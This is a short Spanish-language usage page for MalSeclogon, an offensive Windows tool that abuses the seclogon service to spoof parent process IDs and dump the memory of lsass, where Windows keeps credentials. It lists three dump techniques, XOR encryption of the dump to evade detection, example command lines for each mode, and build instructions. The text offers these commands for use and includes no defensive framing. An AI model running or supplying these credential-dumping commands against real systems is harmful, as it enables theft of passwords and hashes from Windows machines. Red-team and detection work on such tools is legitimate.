
Una pequeña herramienta para jugar con el servicio Seclogon
Una pequeña herramienta para jugar con el servicio Seclogon.
Detalles técnicos completos en:
MalSeclogon v0.2
@splinter_code
Args:
-p PID del proceso para suplantar el PPID a través del servicio seclogon
-d Método de volcado de lsass
1 = Volcar lsass usando handles filtrados
2 = Volcar lsass usando handles filtrados y proceso lsass clonado
3 = Volcar lsass robando el handle de seclogon. (Por defecto)
-o Ruta de salida del volcado (por defecto C:\lsass.dmp)
-c Linea de comandos del proceso suplantado, por defecto: cmd.exe (no compatible con -d)
-k Clave XOR para cifrar el volcado. Compatible solo con -d 3. Valores permitidos 1-255. Por defecto = 40.
-f Ruta a un archivo de volcado cifrado. Esto descifra el volcado. Si no se especifica una clave -k, el valor por defecto es 40.
Ejemplos:
- Ejecutar un proceso con un PPID suplantado:
Malseclogon.exe -p [PPID] -c cmd.exe
- Volcar lsass usando handles filtrados:
Malseclogon.exe -d 1
- Volcar lsass usando handles filtrados y proceso lsass clonado:
Malseclogon.exe -d 2
- Volcar lsass robando el handle de seclogon usando clave xor 40:
Malseclogon.exe -d 3 -o C:\lsass.dmp.xor -k 40
- Descifrar un archivo dmp de lsass con la clave 40:
Malseclogon.exe -f C:\lsass.dmp.xor -k 40
No compile versiones "Debug" o "x86". El binario compilado no funcionará si se usan estas compilaciones. La compilación correcta a utilizar es "Release x64".